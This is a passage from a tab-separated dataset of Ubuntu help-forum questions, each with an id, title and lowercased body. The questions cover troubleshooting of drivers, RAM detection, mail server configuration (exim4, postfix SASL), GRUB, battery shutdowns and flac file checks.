] amd-vi : event logged [ io_page_fault device=05:00.0 domain=0x0019 address=0x0000000000092ae0 flags=0x0020 ] jul 23 11:07:36 bart kernel : [ 196.759458 ] amd-vi : event logged [ io_page_fault device=05:00.0 domain=0x0019 address=0x0000000000092af0 flags=0x0020 ] jul 23 11:07:36 bart kernel : [ 196.759458 ] amd-vi : event logged [ io_page_fault device=05:00.0 domain=0x0019 address=0x0000000000092ac0 flags=0x0020 ] jul 23 11:07:36 bart kernel : [ 196.759458 ] amd-vi : event logged [ io_page_fault device=05:00.0 domain=0x0019 address=0x0000000000092ad0 flags=0x0020 ] jul 23 11:07:36 bart kernel : [ 196.759458 ] amd-vi : event logged [ io_page_fault device=05:00.0 domain=0x0019 address=0x0000000000092ad0 flags=0x0020 ] jul 23 11:07:36 bart kernel : [ 196.759458 ] amd-vi : event logged [ io_page_fault device=05:00.0 domain=0x0019 address=0x0000000000092ae0 flags=0x0020 ] jul 23 11:07:36 bart kernel : [ 196.759458 ] amd-vi : event logged [ io_page_fault device=05:00.0 domain=0x0019 address=0x0000000000092af0 flags=0x0020 ] jul 23 11:07:36 bart kernel : [ 196.759458 ] amd-vi : event logged [ io_page_fault device=05:00.0 domain=0x0019 address=0x0000000000092af0 flags=0x0020 ] i have tried to install the official driver of this realtek-nic , but with no success . but when i install debian 6 , all the problems are gone and the server works fine . when i reinstall ubuntu-server-12.04 i have the same problem . any suggestions what i can do ? thank you and greetings , nico h .
167024	unable to safely remove usb-drive	i am unable to safely remove my nokia e63 ( connected via cable ) . error detaching : helper exited with exit code 1 : detaching device /dev/sdc usb device : /sys/devices/pci0000:00/0000:00:1a.0/usb1/1-1/1-1.2 ) synchronize cache : failed : no such file or directory ( continuing despite synchronize cache failure . ) stop unit : failed : no such file or directory what does this mean ? ? this happens with every usb storage device i connect and exchange data with . removing it directly results in the data being written incompletely .
167025	how to open file from unity with non-default application	say i search for a recently used screenshot via unity dash . when i click on it , it opens with the default application , in my case the image viewer . what if i want to open it with say gimp ? there is no way to do a right-click , right ? and i do n't want to change the default application for one case - usually i want to open pictures with the image viewer . do i have to go the long way and open it with the image viewer first and go to `` open with '' after that ? is there no shortcut ?
167042	64-bit and 32-bit 12.04 report 1gb less ram	updated with mobo/cpu and some bios info my first post/question in here . i 've been reading other related posts and ca n't seem to find the answer , so my apologies if this seems to be a double or triple post of the same issue . i have 4gb of ram ; 4 identical 1gb sticks . i am on a dell vostro 200 ( non-slim ) with a nvidia 1gb 9500gt gfx card . i installed ubuntu 11.04 32-bit and found that my ram was reported as 3.1gb . after upgrading to 12.04 32-bit , it still said i had 3.1gb . after doing a bit of reading i installed the pae and restarted , after which 3.1gb was still being reported . i 've run my hackintosh and win7 on this same machine in 64-bit ( among other os which all reported 4gb ram ) so i decided to do a fresh install of 12.04 64-bit to see if that helped . now the ram is being detected as 2.9gb . from what i understand it is unnecessary to install pae in 12.04 because the kernel uses it by default . i found a similar article in here regarding the clock speeds of the memory , but all 4 of mine are 667mhz , so i believe they should n't be conflicting . i 've also read about memswap settings in the bios , which i have n't been able to find or at least identify . is there any way to `` help '' ubuntu detect/use that last 1gb of ram ? is it worth the hunt or should i be happy with what i 've got ? any help would be greatly appreciated . cheers info bios revision 1.0.5 bios advanced chipset features : video mem size : 1mb | 8mb dvmt mode : fixed | dvmt dvmt/fixed mem size : 128mb | 256mb | max output of uname -a : linux personguy-vostro-200 3.2.0-23-generic # 36-ubuntu smp tue apr 10 20:39:51 utc 2012 x86_64 x86_64 x86_64 gnu/linux output of free -m : total used free shared buffers cached mem : 3009 2773 236 0 197 1735 -/+ buffers/cache : 840 2169 swap : 141 0 140 relevant sections of lshw : description : desktop computer product : vostro 200 ( ) vendor : winbond electronics version : oem serial : 17bkc3j width : 64 bits capabilities : smbios-2.5 dmi-2.5 vsyscall32 configuration : boot=normal chassis=desktop uuid=44454c4c-3700-1042-804b-b1c04f43334a *-core description : motherboard product : 0cu409 vendor : winbond electronics physical id : 0 version : ��� serial : ..cn7360478n02pu . *-firmware description : bios vendor : winbond electronics physical id : 0 version : 1.0.5 date : 09/14/2007 size : 128kib capacity : 1984kib capabilities : isa pci pnp apm upgrade shadowing cdboot bootselect socketedrom edd int13floppy360 int13floppy1200 int13floppy720 int13floppy2880 int5printscreen int9keyboard int14serial int17printer int10video acpi usb ls120boot zipboot biosbootspecification netboot *-cpu description : cpu product : intel ( r ) core ( tm ) 2 duo cpu e4500 @ 2.20ghz vendor : intel corp. physical id : 4 bus info : cpu @ 0 version : intel ( r ) core ( tm ) 2 duo cpu e4500 @ 2.20ghz slot : socket 775 size : 1200mhz capacity : 4ghz width : 64 bits clock : 200mhz capabilities : x86-64 fpu fpu_exception wp vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx constant_tsc arch_perfmon pebs bts rep_good nopl aperfmperf pni dtes64 monitor ds_cpl est tm2 ssse3 cx16 xtpr pdcm lahf_lm cpufreq configuration : cores=2 enabledcores=2 threads=2 ~~~~~~~~~~~~~ *-bank:0 description : dimm ddr2 synchronous 667 mhz ( 1.5 ns ) product : 16htf12864ay-667b3 vendor : micron technology physical id : 0 serial : e9014b5f slot : dimm1 size : 1gib width : 64 bits clock : 667mhz ( 1.5ns ) *-bank:1 description : dimm ddr2 synchronous 667 mhz ( 1.5 ns ) product : 16htf12864ay-667b3 vendor : micron technology physical id : 1 serial : e9014b70 slot : dimm2 size : 1gib width : 64 bits clock : 667mhz ( 1.5ns ) *-bank:2 description : dimm ddr2 synchronous 667 mhz ( 1.5 ns ) product : 16htf12864ay-667b3 vendor : micron technology physical id : 2 serial : e9014b76 slot : dimm3 size : 1gib width : 64 bits clock : 667mhz ( 1.5ns ) *-bank:3 description : dimm ddr2 synchronous 667 mhz ( 1.5 ns ) product : 16htf12864ay-667b3 vendor : micron technology physical id : 3 serial : e8013762 slot : dimm4 size : 1gib width : 64 bits clock : 667mhz ( 1.5ns ) e820 section of dmesg : [ 0.000000 ] bios-provided physical ram map : [ 0.000000 ] bios-e820 : 0000000000000000 - 000000000009e800 ( usable ) [ 0.000000 ] bios-e820 : 000000000009e800 - 00000000000a0000 ( reserved ) [ 0.000000 ] bios-e820 : 00000000000f0000 - 0000000000100000 ( reserved ) [ 0.000000 ] bios-e820 : 0000000000100000 - 00000000bfe90000 ( usable ) [ 0.000000 ] bios-e820 : 00000000bfe90000 - 00000000bfee3000 ( acpi nvs ) [ 0.000000 ] bios-e820 : 00000000bfee3000 - 00000000bfef0000 ( acpi data ) [ 0.000000 ] bios-e820 : 00000000bfef0000 - 00000000bff00000 ( reserved ) [ 0.000000 ] bios-e820 : 00000000e0000000 - 00000000f0000000 ( reserved ) [ 0.000000 ] bios-e820 : 00000000fec00000 - 0000000100000000 ( reserved ) [ 0.000000 ] nx ( execute disable ) protection : active [ 0.000000 ] dmi 2.5 present . [ 0.000000 ] dmi : dell inc. vostro 200/0cu409 , bios 1.0.5 09/14/2007 [ 0.000000 ] e820 update range : 0000000000000000 - 0000000000010000 ( usable ) == > ( reserved ) [ 0.000000 ] e820 remove range : 00000000000a0000 - 0000000000100000 ( usable )
167043	how do i configure exim4 to send mail through a password protected ssl smtp mail server ?	i 'd like my cronjobs to be able to send mail from my home computer . my servers configure exim4 like this : dc_eximconfig_configtype='internet' dc_other_hostnames= '' dc_local_interfaces='127.0.0.1' dc_readhost= '' dc_relay_domains= '' dc_minimaldns='false' dc_relay_nets= '' dc_smarthost= '' cfilemode='644' dc_use_split_config='false' dc_hide_mailname= '' dc_mailname_in_oh='true' dc_localdelivery='maildir_home' however , at home , my isp blocks mail sent directly via a firewall . i have a password proteced ssl smtp server that i could route the mail through , but i have been unsuccessful in figuring out how to configure exim4 to make this work . i 'm hoping somebody can give me a configuration example where i can plug in the host name , user name , password , and `` use ssl '' to get it to send mail through a single smtp server .
167053	add quotation marks to selected word via shortcut	is there any way ( plugin , script ) to add quotation marks ( or square brackets or parentheses ) at the beginning and the end of selected text via a keyboard shortcut in the kate editor ? i think of something like selecting a word and then pressing ctrl-u ( this would upcase the selected word ) . is there something similar for quotation marks ? the `` configure shortcuts '' menu does not provide this option .
167054	terminal window disappears after i minimize it	i just installed ubuntu 12.04 . i create a terminal using ctrl+alt+t , then i minimize it , and then i can not find it anymore - not in the launcher , not in alt+tab . how can i return to my minimized terminal ?
167056	system-wide scrollbar theme	i have kubuntu 12.04 ( kde 4.8.4 ) . i also have ubuntu-desktop installed . i am using the oxygen , which i like very much except for the scrollbars . i have written a scrollbar theme ( based on gmail scrollbar theme for firefox ) . how can i make sure that every window uses my scrollbar theme instead of oxygen 's ? i found some css files in /usr/share/themes/oxygen-gtk/gtk-3.0/ . is there something i can edit there ? my scrollbar theme can be found here , if anyone is interested .
167057	ubuntu update-grub2 is n't recognising 3rd boot sabayon	after installing sabayon , sabayon took over the boot process . i have reinstalled grub with sudo grub-install /dev/sda which i got from ubuntu wiki grub2 sabayon is an lvm on sda8 and sda9 see below . sayth @ sayth-travelmate-5740g [ ~ ] [ 22:03 ] : fdisj -l zsh : correct 'fdisj ' to 'fdisk ' [ nyae ] ? y disk /dev/sda : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x104abfd7 device boot start end blocks id system /dev/sda1 * 2048 27265023 13631488 27 hidden ntfs winre /dev/sda2 27265024 27469823 102400 7 hpfs/ntfs/exfat /dev/sda3 27469824 786911894 379721035+ 7 hpfs/ntfs/exfat /dev/sda4 786913218 976768064 94927423+ 5 extended /dev/sda5 786913280 812302335 12694528 83 linux /dev/sda6 812304384 816254975 1975296 82 linux swap / solaris /dev/sda7 816257024 871153663 27448320 83 linux /dev/sda8 871155712 872179711 512000 83 linux /dev/sda9 872181760 976766975 52292608 8e linux lvm however when you update-grub2 it does n't detect that sabayon exists , how can i fix this ? edit i also then tried to redo it using grub-customizer but it just does n't seem to detect it . 2nd edit : i think from reading around it does n't like /dev/sda8 as its a boot partition for the lvm on sda9 . it flat out will not recognise it .
167061	recording sound ( playing from an external device ) and save to my pc using line-in and line-out	i want to record and save say , music being played on my i-pod , to my pc . is this do-able ? i was thinking if it can be done by connecting my i-pod 's line-out to the line-in of my pc . if any cli or packages available for this ? any help will be appreciated
167062	netbook performs hard shutdown without warning on low battery power	my asus eee netbook performs a hard shutdown when it reaches low battery power , without giving any warning - i.e . the power just goes off , without any shutdown process . i ca n't find anything in the syslog , and no error messages are printed before it happens . i 've had this problem on previous ( k ) ubuntu versions , and hoped updating to ubuntu precise would help resolve the issue , but it has n't . the option in the power application for `` when power is critically low '' is currently blank - the only options are a ( grayed-out ) hibernate and `` power off '' . i have re-installed indicator-power to no effect . the time remaining reported by acpi is unstable , as is the time remaining reported by gnome-power-statistics . ( for example , running acpi twice in succession , i got 2h16min , and then 3h21min remaining . these sorts of jumps in the remaining time are also in the gnome-power-statistics graphs . ) it might be possible to write a script to give me advance warning ( as per @ ranrag 's comment below ) , but i would prefer to isolate why i do n't get a critical battery notification from the system before this happens , so that i can take action as appropriate ( suspend/shutdown/plug in power ) when i get a notification . some additional information on the battery : kroon @ minia : ~ $ upower -i /org/freedesktop/upower/devices/battery_bat0 native-path : /sys/devices/lnxsystm:00/device:00/pnp0a08:00/pnp0c0a:00/power_supply/bat0 vendor : asus model : 1005p power supply : yes updated : fri aug 17 07:31:23 2012 ( 9 seconds ago ) has history : yes has statistics : yes battery present : yes rechargeable : yes state : charging energy : 33.966 wh energy-empty : 0 wh energy-full : 34.9272 wh energy-full-design : 47.52 wh energy-rate : 3.7692 w voltage : 12.61 v time to full : 15.3 minutes percentage : 97.248 % capacity : 73.5 % technology : lithium-ion history ( charge ) : 1345181483 97.248 charging 1345181453 97.155 charging 1345181423 97.062 charging 1345181393 96.970 charging history ( rate ) : 1345181483 3.769 charging 1345181453 3.899 charging 1345181423 4.061 charging 1345181393 4.201 charging kroon @ minia : ~ $ cat /proc/acpi/battery/bat0/state present : yes capacity state : ok charging state : charging present rate : 332 ma remaining capacity : 3149 mah present voltage : 12612 mv kroon @ minia : ~ $ cat /proc/acpi/battery/bat0/info present : yes design capacity : 4400 mah last full capacity : 3209 mah battery technology : rechargeable design voltage : 10800 mv design capacity warning : 10 mah design capacity low : 5 mah cycle count : 0 capacity granularity 1 : 44 mah capacity granularity 2 : 44 mah model number : 1005p serial number : battery type : lion oem info : asus
167067	why do i get the error : `` no command 'update ' found '' ?	i just have installed ubuntu 10.10 , but when i enter update in the terminal i get this message : no command 'update ' found , did you mean : command 'uupdate ' from package 'devscripts ' ( main ) command 'lupdate ' from package 'libqt4-dev ' ( main ) command 'lupdate ' from package 'qt3-dev-tools ' ( main ) update : command not found would you please help me if you have any idea ?
167072	how do i detect wireless broadband on ubuntu ?	i have ubuntu 11.10 , i have moved into a new house with shared sky broadband and i would like to know how to detect the wireless automatically as i am not sure i can get all the information required to configure it myself as the person in charge of the internet is a bit of a grumpy old ** basically . i have the password ( network key ? ) i think ( ! ) , i just need ubuntu to detect the wireless automatically ( and connect to it automatically whenever i start my computer ) . im not very computer literate , so if you answer this question please take that into consideration before speaking another language ! thanks !
167073	getting server kernel source	i 'm trying to get the kernel source for the version of the kernel running on the cluster that i have taken over administering , as i need the kernel source to update some 3rd party modules ( lustre ) . uname -a reports linux buster-fe0 2.6.32-33-server # 72-ubuntu smp fri jul 29 21:21:55 utc 2011 x86_64 gnu/linux however when i try getting the kernel sources i get : apt-get source linux-image- $ ( uname -r ) reading package lists ... done building dependency tree reading state information ... done picking 'linux ' as source package instead of 'linux-image-2.6.32-33-server' notice : 'linux ' packaging is maintained in the 'git ' version control system at : http : //kernel.ubuntu.com/git-repos/ubuntu/ubuntu-lucid.git skipping already downloaded file 'linux_2.6.32.orig.tar.gz' need to get 5,522kb of source archives . err http : archive.ubuntu.com/ubuntu/ lucid-updates/main linux 2.6.32-41.90 ( dsc ) 404 not found [ ip : 91.189.92.192 80 ] err http : archive.ubuntu.com/ubuntu/ lucid-updates/main linux 2.6.32-41.90 ( diff ) 404 not found [ ip : 91.189.92.192 80 ] failed to fetch http : archive.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.32-41.90.dsc 404 not found [ ip : 91.189.92.192 80 ] failed to fetch http : archive.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.32-41.90.diff.gz 404 not found [ ip : 91.189.92.192 80 ] e : failed to fetch some archives . anyone have any idea what 's going on here or how to fix it ?
167088	keyboard shortcut equivalent to right-clicking	i am looking for a keyboard shortcut to raise a context menu using ubuntu on a macbook pro . pressing the keyboard shortcut should have the same effect as right-clicking at the cursor location . on windows keyboards , there is a dedicated button for this near the space bar . i have also read about using shift+f10 or ctrl+space , but these have no effect on my system .
167089	installing ubuntu with windows 7	i am completely new to ubuntu . i use mostly macs . i want to install ubuntu on a windows machine . i have windows on a 1tb disk and insert a 2tb disk that i want to install ubuntu on . i do not really understand how i partition the ubuntu disk . i want a dual boot so i can choose which system i want to run . we are talking about windows 7 and ubuntu 12.04 . is there anyone who can describe how i best set up the ubuntu disk ?
167093	how to find reason for slowing down while running ubuntu ?	when working on the desktop , i sometimes encounter a sudden slowing down of ubuntu unity . i can not reproduce the error but would like to be a proactive linux user and find out what could be the problem . how does your your error tracking system look like ? i am looking for strategies , not only simple advice like : usetop . i want to slowly understand , which program is causing the problem and be able to send in bug tickets .
167095	differentiate between apk and jar files	is there any way to tell these two files apart ? they 're both identified as zip files using the command file , so is there a way to tell them apart ? ( disregarding extension of course ) . note : trying to perform file analysis , both these files run through different analysis so i have to be able to tell them apart .
167104	virtual packages ; offline installation problem	i have a problem with offline installation of a package . for instance ; python-qt4 module requires sip-api-8.1 but it is a virtual package , hence there is no .deb file to install . how can i fix this situation ? i know that python-sip package provides it , but i am looking for a general solution . $ apt-cache show python-qt4 package : python-qt4 priority : optional section : python installed-size : 12103 maintainer : ubuntu developers < ubuntu-devel-discuss @ lists.ubuntu.com > original-maintainer : debian python modules team < python-modules-team @ lists.alioth.debian.org > architecture : i386 version : 4.9.1-2ubuntu1 replaces : python-qt4-dev ( < < 4.4.4-3~ ) provides : python2.7-qt4 depends : python2.7 , python ( > = 2.7.1-0ubuntu2 ) , python ( < < 2.8 ) , libc6 ( > = 2.3 ) , libgcc1 ( > = 1:4.1.1 ) , libpython2.7 ( > = 2.7 ) , libqt4-dbus ( > = 4:4.8.0-1~ ) , libqt4-declarative ( > = 4:4.8.0-1~ ) , libqt4-designer ( > = 4:4.8.0-1~ ) , libqt4-help ( > = 4:4.8.0-1~ ) , libqt4-network ( > = 4:4.8.0-1~ ) , libqt4-script ( > = 4:4.8.0-1~ ) , libqt4-scripttools ( > = 4:4.8.0-1~ ) , libqt4-svg ( > = 4:4.8.0-1~ ) , libqt4-test ( > = 4:4.8.0-1~ ) , libqt4-xml ( > = 4:4.8.0-1~ ) , libqt4-xmlpatterns ( > = 4:4.8.0-1~ ) , libqtassistantclient4 ( > = 4.6.3 ) , libqtcore4 ( > = 4:4.8.0-1~ ) , libqtgui4 ( > = 4:4.8.0-1~ ) , libqtwebkit4 ( > = 2.2~2011week36 ) , libstdc++6 ( > = 4.1.1 ) , sip-api-8.1 suggests : python-qt4-dbg however : $ apt-cache show sip-api-8.1 n : ca n't select versions from package 'sip-api-8.1 ' as it is purely virtual edit : how does this select python-sip instead of the original ? $ apt-get install -s sip-api-8.1 reading state information ... done note , selecting 'python-sip ' instead of 'sip-api-8.1'
167106	how do i install ubuntu using uefi	sorry , i know there have been similar questions , but the answers to them did not help me . i 'm trying to install ubuntu 12.04 on my new sony vaio s15 ( 64 bit ) , which uses uefi , but so far i have n't gotten it to work . windows 7 has to use uefi . with legacy i get an error message : operating system not found , but ubuntu starts fine from both cd and usb drive . but i do n't want to shift back and forth every time i have to use windows . can anybody please tell me what i can do to install ubuntu using uefi ? ( i do n't want to use the windows installer as it seems i can not set the size of the partitions myself ... )
167107	hardware acceleration does n't seem to be working on an nvidia geforce 8800	so , i decided to ditch my old 11.10 wubi install and make my install of 12.04 a fresh install that does n't use wubi . unity 3d worked fine on 11.10 until nvidia sent out those botched drivers , but here on my current install , unity 3d will kick me right back out to the login screen before it even loads anything . which is puzzling , since my hardware is supposedly compatible : i seem to have similar problems with gnome-shell as well , which is puzzling . i 'm guessing my problems with these stem from hardware acceleration not working properly , which is puzzling . is there any reasons why hardware acceleration is n't working ?
167109	resolv.conf containing 127.0.0.1	i have just installed ubuntu 12.04 on a dual-stack network ( with managed ipv6 configuration ) . i would like to verify if the dns resolver options received from dhcp and dhcpv6 servers are correct . normally , i would check /etc/resolv.conf , but on ubuntu it contains only 127.0.0.1 . it would be a bit far-fetched to assume that ubuntu is running a recursive dns resolver by default , so i think the actual resolver settings are somewhere else . where would i check this ?
167113	not able to use reliance netconnect+ modem zte ac2737	as is install ubuntu 12.04 my first linux and ubuntu os ever i followed all the guides and forums to use my reliance netconnect+ which has modem zte ac2737 it does not connect ans shows are now offline after trying for connection i called reliance tech support but they said this model is support up
167114	different backgrounds on 3 monitor set-up	i currently have a 3 monitor set-up using an amd hd6870 card . all monitors are 1920 x 1080 and in a 16:9 configuration . however 2 are orientated as landscape whilst one is in portrait . the way i have them configured is as a multi-desktop set-up and i am using amd 's catalyst for this not xinerama . i wanted to know if it is possible to display separate backgrounds on each monitor , or at the least have the 2 landscape monitors have the same one whilst the portrait monitor has a different one ? thanks for any help . tom
167115	how to setup a wired network in the ipv4 network settings ?	i have a problem with setting up the network in the ipv4 wired network settings . my isp gave me an ip address that goes like this for my windows 7 pc ip address : ***.**.** . *** subnet mask : ***.***.*** . * default gateway : ***.**.** . * dns server : preferred dns server : ***.**.** . * alternate dns server : ***.***.** . * please help get my issue solved . please tell me how to enter all these details in the ubuntu settings to get on the network . i 've contacted my isp and he has no idea of this as ubuntu is not very commonly used os on their network .
167117	redirect file path `` > > ''	i have the function : function > > file.txt this creates the file.txt in my current directory . i have a folder log in the same directory , how would i request file.txt to be created in my log file ( a directory higher ) ? i tried : function > > log/file.txt and am unsure why this did n't work for me
167125	is it possible to store configuration values in a webapp ?	i 'm currently playing around with the ubuntu webapps preview . for some cases it may be useful to store some configuration settings . does anyone know if this is possible ?
167129	installation of libavcodec-extra or libmp3lame fails	i 'm trying to install ffmpeg on my dedicated server running on ubuntu 10.04 . i want to convert flv-videos to mp3 sound files . as i found out , i have to install libavcodec-extra-52 . when i use sudo apt-get install libavcodec-extra-52 it says that i do n't have libfaac0 ( > = 1.26 ) and libmp3lame0 and that they are n't installable . using sudo apt-get install libmp3lame0 it says that the package is n't available at any source . do i need some special repository to be able to download those codecs ? right at the moment , i have only three sources for packages in /etc/apt/sources.list which are predefined and hosted by my provider . thanks in advance .
167132	which ubuntu should i install for > 8gb ram ?	i having using ubuntu for about 6 years now . i have seen some of its bests and some of its worsts . i have tried ubuntu 64 bits and have many issues , among them the computer ran a lot slower than with 32 bits . i want to buy a > 8gb ram computer and i 'm considering which version of ubuntu to use . i have heard something about ubuntu 32 bits with pae , or ubuntu 64 bits . which version has less issues/ will work ?
167133	if i install the server version and then add all the gui programs to it will i be able to get updates until 2015 ?	i have an older laptop that maybe a bit too slow for 12.04 , but it runs great on v10 . i am about to re-install the 10.04 back on it , but i am trying to decide which version i should go with . i noticed that the desktop version has a lts support terms until april , 2013 ( next year ) , but the server version is good till april , 2015 . so i am thinking if i install the server version and then add all the gui programs to it - will i still be able to get updates till 2015 ? also , i ca n't seem to find any information about lts end of life for the alternate cd . do you know what 's the deal with that ? what would you recommend ?
167134	how to install firefox 14.0.1 from a tar.bz2 which is located in /usr/downloads ?	i have downloaded firefox 14.0.1 as a tar.bz2 file . it is located in my downloads folder . could you please tell me how can i install it ? thanks in advance : )
167137	is it possible to have a small indicator showing that updates are available ( red for security updates ) instead of having the update manager pop up ?	i 'm on ubuntu 12.04 with unity . i 've been googling for an answer to that question for several weeks and found nothing . what i want is the old behaviour where a small indicator icon shows that there are available updates . it 's very annoying and inelegant to have the update manager pop up .
167140	google chrome with strange behavior	i 'm former chromium-browser user , but after not upgrading the ppa for 2 months , i switched to google chrome browser yesterday . everything is okay , except some strange behavior on some pages and crashing after loading `` chrome : // '' configuration pages . the best known website with strange behavior is youtube , there is a picture what i see : when i open user menu in top right corner , it crashes that way and even after closing the menu , some parts of menu stay display . you may say it 's youtube problem , no , i have this problem at least on three other websites , here it is on imgur : the problem is n't for the whole side , sometimes it happens from the middle of the screen . the interesting part is that it happens everytime in the same distance from the right border . when i check the dom elements with the developer tool , the overlay which shows element 's position is rendered how it should be . what is more , if there is anchor after the crashed area , it works after clicking on it . selecting text in crashed page is impossible . i hope there is enough information to give me an advice , thanks in advance . : ) edit : here is what the browser posted in `` chrome : //gpu-internals/ '' : graphics feature status canvas : software only , hardware acceleration unavailable compositing : hardware accelerated 3d css : hardware accelerated css animation : software animated . webgl : hardware accelerated webgl multisampling : hardware accelerated problems detected accelerated css animation has been disabled at the command line . accelerated 2d canvas is unstable in linux at the moment . ubuntu 12.04 | gnome-shell 3.4.1 | ati radeon 4550 | screen resolution 1024*768 | chrome version 20.0.1132.57 ( official build 145807 )
167141	brightness controls does n't work in hp g62 ( ubuntu 12.04 )	i have installed ubuntu 12.04 and i think everything is working except for the brightness controls of the laptop . please answer .
167147	opening a file from terminal	when we want to open an application or file from the terminal , we type , say , okular file.dvi this opens the application , but also shows the status of the application . we can not close the terminal , because it kills the process . unfortunately , if you 're trying to , for example , create a latex file , you will need one tab for the text editor , one for the dvi file , and so on . and if you 're trying to open all windows from the terminal , you can forget it . i 'm trying use the terminal as much as possible , and while i have yakuake , it is still a bother having so many tabs and seeing which of those have an application i 've killed and so on . so , is there a way to open an application/file from the terminal so that the status does n't show and immediately gives the prompt so that we can use it to open more applications ?
167150	re-setting ubuntu , checking files	is there any way to check files in ubuntu and reset config if there is something wrong ? some application that will go through the files and detects if they are in a good standing .
167156	keyboard shortcuts to switch directly to applications	using unity is there a way to create a single key shortcut to switch to an existing instance of an application ? for instance , rather than hitting alt-tab n times to switch to my browser i could simply hit f1 , for a terminal i could hit f2 . the run-one solution in another question does n't work as it launches a new instance . the launcher itself comes close as it allows me to use super- [ 0-9 ] for pinned applications . this would be sufficient if i could remap the launcher shortcuts to be single keys . perhaps there is a dbus message that could be send from a script and the script could be tied to a custom shortcut ? a simpler solution would be great too .
167158	ubuntu 12.04 freezes at login unless windows was started first	i have bought a toshiba laptop satellite c665d-m5010 . the details are here : http : //www.toshiba-india.com/laptop/satellite-c665-amd-viewmodel.html i have installed ubuntu 12.04 which freezes on login screen . the system is dual-boot with windows 7 on it . if i start windows first and then restart to login in ubuntu everything works fine . i am not able to find out any solutions . please help me out .
167160	how can i recursively check folders with flac files for corruption ?	something caused to damage some of my flac files , and to find out which ones i need to rerip , i would like to get a list containing only the damaged files . how i do it now : open a terminal in a directory , and enter : $ flac -t *.flac the output of good files is something like : song1.flac : ok song2.flac : ok on some of my old rips i get warnings , but the song seems to be okay : song3.flac : warning , can not check md5 signature since it was unset in the streaminfo song3.flac : ok but when an error occurs , the messages are something like : song4.flac : testing , 73 % complete song4.flac : error while decoding data state = flac__stream_decoder_end_of_stream song5.flac : error while decoding data state = flac__stream_decoder_read_frame song6.flac : error , md5 signature mismatch song7.flac : *** got error code 3 : flac__stream_decoder_error_status_unparseable_stream song7.flac : *** got error code 0 : flac__stream_decoder_error_status_lost_sync song7.flac : error while decoding data state = flac__stream_decoder_read_frame the flac stream may have been created by a more advanced encoder . try metaflac -- show-vendor-tag song7.flac if the version number is greater than 1.2.1 , this decoder is probably not able to decode the file . if the version number is not , the file may be corrupted , or you may have found a bug . in this case please submit a bug report to http : //sourceforge.net/bugs/ ? func=addbug & group_id=13478 make sure to use the `` monitor '' feature to monitor the bug status . my question is : how can i filter the output to only show files with warnings ( output contains warning ) or errors ( output contains error ) ? i think it might be doable with grep , but i do n't know how to give the output of the flac -t command to grep . with flac -c and if that works , how can i check all subdirs at once ? my music collection is sorted into many subdirs and going to every dir and run the command would be laborious . bonus points if it could output the path of the corrupt file , not only the name : )
167162	how to partition the main drive to install window 7 along side ubuntu	i want to partiton my hard drive so i can dualboot windows 7 . i already installed ubuntu as my only os . i tried gparted from the software center but i ca n't unmount the main ubuntu partition . help please ?
167164	how to reduce the update manager 's bandwidth usage and download volume ?	the ubuntu `` software up to date '' is now becoming painful like windows . every time the update check starts , it takes ages to `` update cache '' and hogs all the internet bandwidth . how to reduce the bandwidth usage of the update process ? additionally , how to remove unnecessary updates of redundant software . i need to also reduce the download volume as quota is limited ( and very costly at about $ 1 per 100mb ) .
167171	screen brightness flickering on a samsung laptop	i have just installed ubuntu 12.04 via the wubi installer . i have windows 7 installed as my main os . now when i turn on my computer and go into ubuntu my screen brightness is on max . when i then turn up the brightness the screen starts to flicker . it also shows thenindicator of how much brightness my screen have . i have a intel core i5 with the intel hd graphics 3000 . i hope you can help me , but so far i have no idea .
167176	smtp auth with postfix and sasl ubuntu 12.04 server	i am trying to setup smtp auth on postfix sasl ubuntu 12.04 server , postfix runs perfectly i just can not get the smtp auth to work , heres my config below . when i try and authenticate via telnet i get an error : 435 unable to authenticate at present no matter what i try i can not get this error to go away . what am i doing wrong ? # postconf -n alias_database = hash : /etc/aliases alias_maps = hash : /etc/aliases append_dot_mydomain = no biff = no broken_sasl_auth_clients = yes config_directory = /etc/postfix content_filter = amavis : [ 127.0.0.1 ] :10024 disable_vrfy_command = yes dovecot_destination_recipient_limit = 1 enable_original_recipient = no header_checks = regexp : /etc/postfix/header_checks inet_interfaces = all mailbox_command = procmail -a `` $ extension '' mailbox_size_limit = 0 maximal_backoff_time = 8000s maximal_queue_lifetime = 7d minimal_backoff_time = 1000s mydestination = localhost.localdomain , localhost mydomain = domain.name myhostname = mail.domain.name mynetworks = 127.0.0.0/8 [ : :ffff:127.0.0.0 ] /104 [ : :1 ] /128 mynetworks_style = host readme_directory = no recipient_delimiter = + relayhost = smtp_helo_timeout = 60s smtp_tls_note_starttls_offer = yes smtp_tls_security_level = encrypt smtpd_banner = $ myhostname esmtp $ mail_name smtpd_client_restrictions = reject_rbl_client sbl.spamhaus.org , reject_rbl_client blackholes.easynet.nl , reject_rbl_client dnsbl.njabl.org smtpd_data_restrictions = reject_unauth_pipelining smtpd_delay_reject = yes smtpd_hard_error_limit = 12 smtpd_helo_required = yes smtpd_helo_restrictions = permit_mynetworks , warn_if_reject reject_non_fqdn_hostname , reject_invalid_hostname , permit smtpd_recipient_limit = 16 smtpd_recipient_restrictions = permit_mynetworks , permit_sasl_authenticated , reject_unauth_destination smtpd_sasl_auth_enable = yes smtpd_sasl_authenticated_header = yes smtpd_sasl_local_domain = smtpd_sasl_path = private/auth smtpd_sasl_security_options = noanonymous , noplaintext smtpd_sasl_tls_security_options = noanonymous smtpd_sasl_type = dovecot smtpd_sender_restrictions = permit_sasl_authenticated , permit_mynetworks , warn_if_reject reject_non_fqdn_sender , reject_unknown_sender_domain , reject_unauth_pipelining , permit smtpd_soft_error_limit = 3 smtpd_tls_auth_only = yes smtpd_tls_cert_file = /etc/ssl/smtpd.crt smtpd_tls_key_file = /etc/ssl/smtpd.key smtpd_tls_loglevel = 4 smtpd_tls_received_header = yes smtpd_tls_security_level = encrypt smtpd_tls_session_cache_timeout = 3600s smtpd_use_tls = yes tls_random_source = dev : /dev/urandom unknown_local_recipient_reject_code = 450 virtual_alias_maps = mysql : /etc/postfix/mysql_virtual_alias_maps.cf , mysql : /etc/postfix/mysql_virtual_alias_domainaliases_maps.cf virtual_gid_maps = static:8 